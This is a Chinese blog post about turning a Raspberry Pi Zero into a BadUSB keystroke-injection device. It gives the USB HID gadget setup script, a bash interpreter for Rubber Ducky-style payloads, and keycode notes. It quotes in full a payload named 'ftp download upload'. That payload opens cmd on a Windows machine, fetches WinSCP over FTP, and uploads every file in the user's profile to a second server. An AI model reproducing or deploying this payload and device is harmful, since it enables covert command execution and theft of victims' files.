基于树莓派的多功能USB实现--BadUSB模式

最新推荐文章于 2024-03-09 19:42:05 发布
置顶 最新推荐文章于 2024-03-09 19:42:05 发布
阅读量4.5k 收藏 24
点赞数 3
分类专栏: linux shell python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qinguo123/article/details/104194276
版权
linux 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
shell
4 篇文章 0 订阅
订阅专栏
python
3 篇文章 0 订阅
订阅专栏

此文首先发表于微信公众号。具体详情请移步公众号查看:WriteSimpleDemo

Github

https://github.com/pedroqin/RaspberryPi-based-multi-functional-USB-Device

Badusb介绍

BadUSB is a dangerous USB security flaw that allows attackers to turn a simple USB device into a keyboard, which can then be used to type malicious commands into the victim’s computer.

钢铁侠11:31:09 处有关于Badusb的演示。。。

方案选择

  1. 在树莓派Zero上已经有比较完整的实现Badusb方案:P4wnP1

P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).

该方案不支持最新的debian10,而且由于其集成了很多功能,与目前多功能USB其他部分设置存在冲突,故舍弃。

  1. 在寻求其他方案过程中发现另一个开源工具: hardpass-passwordmanager(A Raspberry Pi Zero based WiFi Enabled Hardware Password Manager, now with a PCB),这个硬件密码管理器实现了 虚拟ID键盘HID键盘输入解析,这部分正好可以给Badusb使用。剩下的部分就是编写Payload解释器脚本

Payload在本文可以简单理解为实现Badusb单个功能(如Windows解锁,调用cmd窗口运行命令)的流程脚本。

实现

本文采用第二种方案。该实现需要三部分:模拟HID键盘, Payload解释器和内容输入

模拟HID键盘
  1. 初始环境设置
# Enable dwc2 on the Pi
echo "dtoverlay=dwc2" | sudo tee -a /boot/config.txt

# Enable dwc2 initialisation
echo "dwc2" | sudo tee -a /etc/modules
echo "libcomposite" | sudo tee -a /etc/modules
  1. 实际应用中,已将以下脚本注册成服务,需要时enable对应服务并重启即可。
#!/bin/bash

# Initial Setup
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1

# Device description
echo 0x1d6b > idVendor # Linux Foundation
echo 0x0104 > idProduct # Multifunction Composite Gadget
echo 0x0100 > bcdDevice # v1.0.0
echo 0x0200 > bcdUSB # USB2

mkdir -p strings/0x409
echo "abcdef1234567890" > strings/0x409/serialnumber
echo "Pedro Qin" > strings/0x409/manufacturer
echo "raspberry USB device" > strings/0x409/product

# Define a Keyboard
mkdir -p functions/hid.usb0
echo 1 > functions/hid.usb0/protocol
echo 1 > functions/hid.usb0/subclass
echo 8 > functions/hid.usb0/report_length
echo -ne \\x05\\x01\\x09\\x06\\xa1\\x01\\x05\\x07\\x19\\xe0\\x29\\xe7\\x15\\x00\\x25\\x01\\x75\\x01\\x95\\x08\\x81\\x02\\x95\\x01\\x75\\x08\\x81\\x03\\x95\\x05\\x75\\x01\\x05\\x08\\x19\\x01\\x29\\x05\\x91\\x02\\x95\\x01\\x75\\x03\\x91\\x03\\x95\\x06\\x75\\x08\\x15\\x00\\x25\\x65\\x05\\x07\\x19\\x00\\x29\\x65\\x81\\x00\\xc0 > functions/hid.usb0/report_desc
mkdir -p configs/c.1/strings/0x409
ln -s functions/hid.usb0 configs/c.1/

echo "Config 1: Keyboard" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
ls /sys/class/udc > UDC
# for status check
touch /tmp/enable_hid.lock
  1. 实现效果如下:
    图13
模拟Payload解释器

以下是一个叫Payload ftp download upload的Payload:

GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
STRING ftp -i SERVER
ENTER
DELAY 800
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET WinSCP.com
ENTER
DELAY 200
STRING GET WinSCP.exe
ENTER
DELAY 3000
STRING quit
ENTER
REM FTP user only needs write access.
STRING WinSCP.com /command "option batch abort" "option confirm off" "open ftp://USERNAME2:PASSWORD2@SERVER2" "put *.*" "close" "exit"
ENTER
ALT SPACE
STRING N

根据此Payload 脚本,可简单模拟解释器,主要逻辑如下:

    ......
    echo "$@" | while read line;do
        case ${line:0:3} in
            # ctrl
            CON)
            prefix="\x1"
            press_one_key "$prefix" "${line#* }"
            ;;
            # alt
            ALT)
            prefix="\x4"
            press_one_key "$prefix" "${line#* }"
            ;;
            # shift
            SHI)
            prefix="\x2"
            press_one_key "$prefix" "${line#* }"
            ;;
            # windows
            GUI)
            prefix="\x08"
            press_one_key "$prefix" "${line#* }"
            ;;
            # comments
            REM)
            continue
            ;;
            # input str
            STR)
            input_string "${line#* }"
            ;;
            # enter
            ENT)
            press_enter
            ;;
            # delay
            DEL)
            sleep "${line#* }"
            ;;
            EXI)
            return
            ;;
            *)
            input_string "${line}"
            ;;
        esac
    done
    ......
内容输入

HID键盘协议:ID Usage Tables 1.1210 Keyboard/Keypad Page (0x07)

实现字符串输入需要将目标内容解析成HID keycode,然后由HID键盘转回目标内容。

具体有以下两种方案,在实际测试时,需两种方案结合,scan完成符串输入和脚本实现控制字串(如ctrl r等)输入

1. 脚本实现

USB键盘数据包含8个字节:

BYTE1 -- 特殊按键
 |--bit0: Left Control  是否按下,按下为1
 |--bit1: Left Shift    是否按下,按下为1
 |--bit2: Left Alt      是否按下,按下为1
 |--bit3: Left GUI(Windows键) 是否按下,按下为1
 |--bit4: Right Control 是否按下,按下为1
 |--bit5: Right Shift   是否按下,按下为1
 |--bit6: Right Alt     是否按下,按下为1
 |--bit7: Right GUI     是否按下,按下为1

BYTE2 -- 0

BYTE3-BYTE8 当前按下的普通按键键值,最多六个按键

每次输入完后需输入8个0字节结束输入。
示例,输入“A”:

echo -ne "\x2\0\x04\0\0\0\0\0" > /dev/hidg0
sleep 0.1
echo -ne "\0\0\0\0\0\0\0\0" > /dev/hidg0

依此逻辑可以完成键盘模拟输入。但需要注意输入时增加延时。

缺点:效率低,有部分字母显示不正常

2. 引用hardpass-passwordmanager内工具
root@raspberrypi:/tmp# git clone https://github.com/girst/hardpass-passwordmanager
Cloning into 'hardpass-passwordmanager'...
remote: Enumerating objects: 446, done.
remote: Total 446 (delta 0), reused 0 (delta 0), pack-reused 446
Receiving objects: 100% (446/446), 2.00 MiB | 66.00 KiB/s, done.
Resolving deltas: 100% (263/263), done.
Checking out files: 100% (165/165), done.
root@raspberrypi:/tmp# cd hardpass-passwordmanager/send_hid/
root@raspberrypi:/tmp/hardpass-passwordmanager/send_hid# ls
LICENSE  Makefile  README.md  hardpass-demo.sh  main.c  scan  scancodes.c  scancodes.h
root@raspberrypi:/tmp/hardpass-passwordmanager/send_hid# make
gcc -std=c99 -Wall -Werror main.c scancodes.c -o scan

编译生成的scan工具可以完成字符串的输入
缺点:只能实现字符串输入,无法实现控制字符串如GUI r等操作(可通过改源码实现)

演示

视频中演示了payload脚本模式和与AP模式结合时远程控制
视频2

附录

Payload

Well, a payload can be considered to be somewhat similar to a virus. A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits that you can’t imagine. … Generally, a payload refers to a set of codes which a hacker designs according to his/her requirements.

参考链接

what is payload in hacking(https://www.cybrary.it/0p3n/payload-the-hacking-beyond-imagination/)
Payloads(https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads)
hardpass-passwordmanager(https://github.com/girst/hardpass-passwordmanager)
pi-as-keyboard(https://github.com/c4software/pi-as-keyboard)
HID Usage Tables 1.12(https://usb.org/sites/default/files/documents/hut1_12v2.pdf)

PedroQin
关注
专栏目录
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 4160
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
uspi, 在C 中,为 树莓派 编写的裸机USB驱动程序.zip
09-18
uspi, 在C 中,为 树莓派 编写的裸机USB驱动程序 USPi如果你在编辑器中读取这里文件,则应该在。概述USPi是用C 编写的树莓派的裸机USB驱动程序。 它是从 Circle USB图书馆ported的。 使用C 允许用于 树莓派的裸金属C 代码。 它支持控制( 同步),批量和中断
简易BadUSB,攻击效果不简单
02-09 1962
不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知…… 也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。 一、前期准备 Arduino: 这里使用的是BS Micro pro micro l...
BadUsb制作
最新发布
weixin_43893278的博客
03-09 677
badusb制作
树莓派 3B+ 虚拟 USB 串口硬件(USB CDC ACM)是否存在判断,以及启动相应的程序
Hansen Mi Blog
01-30 2158
硬件:树莓派 Raspberry 3B+ 系统:Raspbian GNU/Linux 9 (stretch) 内核:Linux raspberrypi 4.14.93-v7+ #1189 SMP, armv7l GNU/Linux 脚本内容 $vi /var/www/html/bt5net/check_ttyACM_and_run_serial.sh #!/bain/sh ...
树莓派USB摄像头+python+opencv
weever7的博客
07-14 9487
插入usb摄像头,在命令行模式下输入 lsusb 如果看到列举出来的信息有camera的话就说明识别成功,可以使用。1、拍照测试安装 输入以下命令,开启摄像头 2、录像测试安装 输入以下命令,开启摄像头 三、安装python2 如果发现安装的是python3的话就需要把python改为python2分别运行以下两条命令即可~ 在命令行模式下输入命令,测试是否安装成功(如果提示不存在python这个命令,说明可能同时存在pyt
树莓派语音识别(二)麦克风ReSpeaker 4-Mics Pi HAT 的选择与安装
热门推荐
Smile_h_ahaha的博客
10-31 1万+
为啥选它: 那要先知道什么是麦克风阵列(Microphone array),学术上有个概念是“传声器阵列”,主要由一定数目的声学传感器组成,用来对声场的空间特性进行采样并处理的系统。 通俗的讲,就是麦克风阵列是由多个单麦克风按一定顺序排列的。你可以理解为一堆麦克风。我们常见的话筒(比如苹果手机话筒就是单麦克风的)。麦克风阵列一般来说有线形、环形和球形的,严谨的应该说成一字、十字、平面、螺旋、球形及无规则阵列等。至于麦克风阵列的阵元数量,也就是麦克风数量,可以从2个到上千个不等。它们通过特定的排列(阵法)
LINUX嵌入式模拟键盘 2022-05-21
胖胖
05-21 2197
LINUX嵌入式模拟鼠标键盘简介环境说明实现相关实现步骤1.枚举2.数据交互 简介 使用嵌入式设备,通过otg接口连接电脑主机,可以简单的实现键鼠的模拟。 最终的效果:将一个设备插在电脑上,可通过设备中的程序模拟成键盘/鼠标,从而被主机识别,并以此来操控主机。 参考文章: http://trac.gateworks.com/wiki/linux/OTG https://www.kernel.org/doc/html/latest/usb/gadget_configfs.html 参考代码: https://
树莓派:硬盘休眠
weixin_33725515的博客
10-03 2138
此文转自:http://mkitby.com/2016/05/15/raspberry-pi-nas-manage-hdd-power/ 我是用第二种方法实现休眠的。 为了延长硬盘使用寿命,当硬盘不使用时,需要让硬盘休眠,目前有一些软件可以自动做这事,像 hdparm, hd-idle 和 sdparm,具体用哪个取决于USB to SATA控制器和硬盘本身,其实说白了就是一个一个试,哪个有用...
usage.txt-1
huhuoyun的专栏
02-15 1243
系统迁移,虚拟机系统向host机迁移的实现如下: 虚拟机迁移到实体机工具准备: usb 3.0硬盘盒 x1 2T 128 cache x1 usb 3.0 接口 x1 虚拟机迁移到虚拟磁盘的工具准备: 2T vmdk分割 x1 第一部分 制作引导分区 1.grub-install /dev/sdx #将boot安装到/dev/.
树莓派usb控制台
11-29
树莓派通过usb线缆与PC通信,输入linux命令,实现类似控制台的功能。在不知道IP无法ssh登陆的时候非常有用。
Qt开发经验总结
草上爬的博客
12-02 8267
增加了很多轮子,同时原有模块拆分的也更细致,估计为了方便拓展个管理。把一些过度封装的东西移除了(比如同样的功能有多个函数),保证了只有一个函数执行该功能。把一些Qt5中兼容Qt4的方法废弃了,必须用Qt5中对应的新的函数。跟随时代脚步,增加了不少新特性以满足日益增长的客户需求。对某些模块和类型及处理进行了革命性的重写,运行效率提高不少。有参数类型的变化,比如 long * 到 qintptr * 等,更加适应后续的拓展以及同时对32 64位不同系统的兼容。
树莓派(等)为 USB Midi 键盘增添连接方式
weixin_30794499的博客
08-13 1674
我在去年买了一个 M-Audio 的 Midi 键盘,用来连接电脑或者 iPad 弹琴。但是由于琴摆放的位置没有办法拉充电线,所以我能弹琴多久很大程度上取决于设备还有多少电。前一阵子从朋友手里白嫖了个橘子派,我就考虑用这个板子给我的 Midi 键盘做个无线连接的接口,而且还安装了 FluidSynth 让设备可以直接发出声音让我带耳机练琴。 这篇文章中我首先会介绍 FluidSynth 的配置,再...
Raspberry Pi Pico代替鼠标和键盘操作
Dream丶Boy
04-04 1695
Raspberry Pi Pico模拟鼠标键盘,用的是CircuitPython,原理就是模拟鼠标和键盘发送协议数据,让其成为一个系统认可的HID设备,市场上所卖的点击盒子,单头盒子等等都是此原理,需要先。,然后插入Raspberry Pi Pico,在我的电脑中找到相关的磁盘,将UF2文件拖拽进去,磁盘将会自动弹出,等待数秒会出现名为。为自动运行文件,每次插入到电脑,将会自动运行,不过实测有点不稳定,需要改成main.py。分别是X坐标,Y坐标,是否左键点击,是否移动。
自制BadUSB!!(电脑强制关机)
Pleasure1234的博客
01-22 1250
在美剧《黑客军团》中有过这样一个画面,组织成员在警局停车场随机的撒下大量用于钓鱼的 U 盘,然后就发生了下面的画面,然而此时警局的电脑已经被黑,即使断网也已经无济于事了。这就是一种黑客常用的手段 —— 利用 BadUSB 攻击而我今天想要介绍的只是该手段中的其中一种变体,利用了 USB 设备模拟成 HID 设备(Human Interface Device,人机交互设备,比如键盘或鼠标),从而执行代码,进行攻击和数据篡改等操作。下面的图片可以看出它伪装成了人体学输入设备。
树莓派pico入门指引
qq_43200143的博客
11-23 7216
前言 最近在捣鼓Linux内核和驱动的东西,并且看了一本书《穿越计算机的迷雾》,强推!从电开始讲解计算机原理,让我对底层的东西开始感兴趣,就想搞搞硬件,然后之前也了解过有开发板这个东西,在开发板里,树莓派是比较出名的了,树莓派就像一台小电脑一样。在购买的时候我发现了树莓派出了pico这个东西,就是一个微控制器,它不像电脑那么强大,但是也有CPU的那些基本功能,而且价格非常便宜,(万一一开始买了好几百的树莓派不小心烧了呢哈哈哈哈),所以就打算搞一下先玩玩。 微控制器原理 树莓派pico就是一个微控制器,很多地
树莓派pico做鼠标与键盘
weixin_45938469的博客
12-29 2830
pico做鼠标键盘
树莓派使用USB串口通信 CH340
ZhuanShangNiDeXin的博客
02-11 6725
树莓派使用USB串口通信 CH340 个人博客原址:树莓派使用USB串口通信 CH340 因为需要使用树莓派做自控方向的东西,所以需要使用树莓派串口与各种外设进行通信。使用串口的话个人比较喜欢直接使用USB串口,用起来比较方便。下面就介绍一下怎么使用树莓派USB串口通信。 对于不会使用串口通信的hxd可以康康我的这篇文章,里面详细讲解了常用的串口通信的命令:树莓派串口通信 USB串口通信 文章目录树莓派使用USB串口通信 CH340准备树莓派正确识别CH340代码实现通信 准备 树莓派4 CH340
树莓派打开USB口、接收modbus总线串口数据
玩火的稻草人的博客
01-26 2701
把调试好的程序挪到树莓派上暂时运行,下面是详细步骤 1、USB到串口的驱动,树莓派系统中有,不需用另外装驱动。 2、菜单–>首选项–>Raspberry Pi Configure 将Serial Port改为Enable,然后重启。 3、将/boot目录下的cmdline.txt里面的 “console=ttyAMA0, 115200”这句话删掉。(内容可能有差异) sudo vim /boot/cmdline.txt 4、将USB插到树莓派上的任意USB接口上,然后在终端输入命令查看。US
恶女仆攻击新威胁:BadUSB-v2:USB设备的恶意接管演示
SRLabs的"BadUSB-Pacsec-v2"文档聚焦于恶意USB设备(BadUSB)攻击的一种可能场景,即所谓的"邪恶女仆"攻击。这种技术利用了USB设备的底层操作来欺骗主机系统,使得一个看似普通的USB存储设备实际上被重新编程,伪装...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值